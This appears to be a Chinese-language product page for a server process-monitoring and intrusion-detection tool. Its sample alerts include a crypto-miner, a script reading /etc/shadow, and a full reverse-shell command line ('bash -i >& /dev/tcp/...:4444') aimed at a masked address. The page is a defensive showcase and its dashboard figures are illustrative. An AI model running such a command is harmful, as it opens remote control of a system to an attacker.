📊 PROCESS VISIBILITY

进程实时 监控系统

全方位掌握服务器上所有进程的运行状态、资源消耗和异常行为,
实时发现挖矿、反弹Shell、可疑脚本等恶意进程

287
活跃进程数
38.2%
CPU总使用率
5.8G
内存使用量
3
今日异常进程

⚙️ 系统资源 总览

主机关键性能指标实时快照

38%
CPU 使用率
62%
内存使用率
54%
磁盘 I/O

📈 资源使用趋势 (24h)

CPU最高92% (12:30)
内存峰值78% (14:15)
磁盘IO最高65% (03:00)
网络吞吐峰值88MB/s (09:45)

🖥️ 进程列表 TOP

按CPU使用率排序的活跃进程

PID进程名CPU%内存用户运行时长命令行状态
1423nginx12.4%345MBwww14d 3hnginx: worker process正常
2871mysqld8.2%1.2GBmysql14d 2h/usr/sbin/mysqld正常
5623xmrig45.8%892MBroot2h 15m/tmp/.cache/xmrig --donate=0异常
8092php-fpm3.1%156MBwww14d 3hphp-fpm: pool www正常
9234java5.2%2.8GBtomcat7d 6h/usr/bin/java -jar app.jar正常

🚨 异常进程 告警

今日检测到的可疑进程活动

🔴 检测到挖矿进程: /tmp/.cache/xmrig

PID 5623 · CPU占用45.8% · 启动于 root · 进程链接至已知矿池: pool.minexmr.com:443 · 建议立即终止

🔴 反弹Shell连接: bash -i >& /dev/tcp/45.x.x.x/4444

PID 7845 · 由 www 用户启动 · 外联至境外IP · 典型的反弹Shell特征 · 已自动阻断

🟡 可疑Python脚本: /tmp/.update.py 持续运行

PID 6231 · 运行时间 4h22m · 文件名伪装为系统更新 · 持续读取 /etc/shadow · 建议调查

🔍 高级监控 能力

🌳

进程树分析

可视化展示进程父子关系,一眼发现伪装进程(如伪装成nginx的nc)和异常派生链(如bash创建的curl外传)

📋

启动项监控

监控crontab、systemd service、init.d等启动项,防止攻击者添加持久化后门

🧊

进程冻结/终止

支持一键冻结可疑进程(暂停执行保留现场)或立即终止,便于安全分析和应急响应

全面掌控您的服务器进程

30天免费试用 · 一键部署 · 实时监控

立即免费试用 使用文档